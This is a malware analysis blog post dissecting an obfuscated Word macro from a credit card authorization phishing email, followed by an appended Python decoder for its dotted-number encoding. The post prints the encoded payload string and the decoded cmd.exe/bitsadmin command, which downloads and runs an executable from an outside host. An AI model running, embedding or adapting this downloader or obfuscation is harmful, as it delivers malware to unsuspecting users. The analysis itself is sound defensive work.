VirusTotal link
MD5 8cd6cee9d328a0c0fa8d5ddb150cd5e9
Email Subject: XXXX Credit Card Authorization Form
It contained obfuscated macros; a partial example is below:
Sub AutoOpen()
eculso = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
eculso = ekkule(eculso, ".")
resultString2 = ynoqa(eculso)
....
The string eculso clearly contained the malicious command to be run, so I removed the "run" commands in VB and created a de-obfuscate function reversing their VBA code.
Public Function deobfuscate(obfuscated_command)
    ' Re-join the dotted numbers with "%%" and split again on "%", as the macro did;
    ' this leaves empty fields between the numbers, which are skipped below
    pass1 = Join(Split(obfuscated_command, "."), "%%")
    still_obfuscated_command = Split(Trim(pass1), "%")
    resultstr = ""
    For counter = 0 To UBound(still_obfuscated_command)
        If Len(still_obfuscated_command(counter)) > 0 Then
            ' Each number is offset by 10 + 2 + 2 = 14 before being mapped to a character
            rotate_pass2 = CInt((still_obfuscated_command(counter))) + 10
            rotate_pass3 = Chr((rotate_pass2 + 2) + 2)
            converted_string = Array(resultstr, rotate_pass3)
            resultstr = Join(converted_string, "")
        End If
    Next
    deobfuscate = resultstr
End Function

Private Sub Document_Open()
    obfuscated_command = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
    actual_command = deobfuscate(obfuscated_command)
    ' Display the decoded command instead of executing it
    InputBox "malcode", "infosec", actual_command
End Sub
This results in the malicious command being printed to a popup for me to view:
cmd.exe /c "waitfor /t 6 oniju & bitsadmin /transfer utiwpy /download /priority normal hxxp://ppeppeppety[.]com/ttt/2noren.exe %appdata%\ynenm.exe &start %appdata%\ynenm.exe"
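The same decoding outside of Office, as an added example that is not part of the original post: a Python decoder for the dotted-number scheme (split on ".", add 14, map to a character) that also recovers the additive offset when it is not known, by scoring candidate decodes for known command keywords rather than trusting printability alone, and defangs the result for reporting. The keyword list, the offset search range and the defanging helper are assumptions of this example; the obfuscated string is the one from the post.

```python
"""Decoder for the dotted-number macro obfuscation analysed in the post."""
import re
import string

# The obfuscated string from the macro in the post (not a constructed value)
OBFUSCATED = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"

# Assumed keyword list used to rank candidate decodes (edit to taste)
KEYWORDS = ("cmd.exe", "powershell", "bitsadmin", ".exe", "http", "%appdata%")


def decode(obfuscated: str, offset: int = 14) -> str:
    """Split on '.', add the offset to each number and map it to a character.

    The macro's CInt(x)+10, then +2, then +2 adds 14 in total. Chr() would
    fail on a value outside 0..255, so such tokens are rejected here too.
    """
    out = []
    for token in obfuscated.split("."):
        if not token:  # the macro skips empty fields the same way
            continue
        code = int(token) + offset
        if not 0 <= code <= 255:
            raise ValueError(f"token {token!r} out of range at offset {offset}")
        out.append(chr(code))
    return "".join(out)


def find_offset(obfuscated: str, max_offset: int = 64) -> int:
    """Recover an unknown additive offset by scoring each candidate decode.

    Several offsets give fully printable text, so candidates are ranked by
    keyword hits first and by the share of alphanumerics/spaces second.
    """
    best_offset, best_score = -1, (-1, -1)
    for offset in range(-max_offset, max_offset + 1):
        try:
            text = decode(obfuscated, offset)
        except ValueError:
            continue
        if any(c not in string.printable for c in text):
            continue
        hits = sum(text.lower().count(k) for k in KEYWORDS)
        score = (hits, sum(c.isalnum() or c == " " for c in text))
        if score > best_score:
            best_offset, best_score = offset, score
    return best_offset


def defang(command: str) -> str:
    """Make the recovered command safe to paste into a report (hxxp, [.])."""
    command = re.sub(r"http(s?)://", r"hxxp\1://", command, flags=re.IGNORECASE)
    return re.sub(r'(hxxps?://)([^\s/"]+)',
                  lambda m: m.group(1) + m.group(2).replace(".", "[.]"), command)
```

Running `defang(decode(OBFUSCATED, find_offset(OBFUSCATED)))` reproduces the defanged command shown above.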
Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.